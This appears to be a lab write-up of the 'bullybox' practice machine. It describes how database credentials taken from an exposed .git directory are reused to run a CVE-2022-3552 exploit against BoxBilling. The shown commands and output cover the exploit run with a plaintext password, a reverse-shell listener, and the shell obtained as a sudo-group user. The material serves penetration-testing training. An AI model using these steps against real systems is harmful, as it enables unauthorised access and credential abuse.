CVE-2022-3552
The BoxBilling instance in question is suspected to be vulnerable to CVE-2022-3552 due to its use of an outdated version. This vulnerability may expose the system to potential security threats if left unaddressed.
Furthermore, a .git directory was discovered within the instance, which contained a configuration file from which database credentials were successfully extracted. Given the possibility of credential reuse across multiple services, there is an opportunity to leverage these credentials to attempt an exploit. Proper mitigation measures should be considered to prevent unauthorized access and secure sensitive information.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ python3 CVE-2022-3552/CVE-2022-3552.py --domain http://bullybox.local --email admin@bullybox.local --password 'Playing-Unstylish7-Provided'
[+] Successfully logged in
[+] Payload saved successfully
[+] Getting ShellExecuting the exploit script
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.27] 36588
Linux bullybox 5.15.0-75-generic #82-Ubuntu SMP Tue Jun 6 23:10:23 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
17:02:47 up 45 min, 0 users, load average: 0.00, 0.36, 2.63
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
yuki
$ hostname
bullybox
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:8d:47 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.154.27/24 brd 192.168.154.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the yuki user via exploiting CVE-2022-3552